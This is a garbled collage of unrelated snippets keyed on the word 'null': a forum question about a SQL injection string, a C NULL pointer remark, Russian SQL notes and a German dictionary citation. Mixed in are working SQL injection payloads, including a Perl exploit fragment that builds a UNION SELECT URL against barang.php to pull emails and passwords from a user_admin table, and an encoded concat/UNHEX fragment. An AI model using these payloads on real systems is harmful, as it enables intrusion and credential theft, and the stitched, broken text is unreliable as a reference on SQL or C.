Union select null, null, null, null, null, null, null from information_schema.tables. for a small database containing three tables. this instruction is used in sql injection I tried it and it worked but I didn't really know how it works can somebody help me...
The standard NULL can be defined as0 or 0L or ((void *) 0) or in some other way, meaning that it might be interpreted differently in such type-less contexts. An explicit cast will make sure that it is interpreted correctly as a pointer. For example, this is generally invalid (behavior is undefined).
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –- Если нет ошибки, значит синтаксис верный, т.е. используется MS SQL Server.
...Concat((select+%28SELECT+concat%280X7E%2C0X27%2CUNHEX%28HEX%28CAST
Соответственно, IS NOT NULL действует наоборот: вернёт истину, если значение операнда отлично от NULLа и ложь, если он является NULLом
site = $ARGV[0]; $path = $ARGV[1]; $sqlinj = "union+ select+ null, null, null, concat(0x6b3174,email,0x316e), null, concat(0x6b3474,password,0x307574), null, null, null, null, null+ from+ user_admin/*"; $expl = "http://" . $site . $path . "barang.php?produk_id=-9+" .
1.3 Использование UNION + group_concat(). 1.4 Экранирование хвоста запроса. 1.5 Расщепление SQL-запроса.
Referenzen und weiterführende Informationen: [1] Duden online „Null_Null“. [*] canoonet „Null-Null“.
Также может использоваться для присвоения значения NULL, если столбец не имеет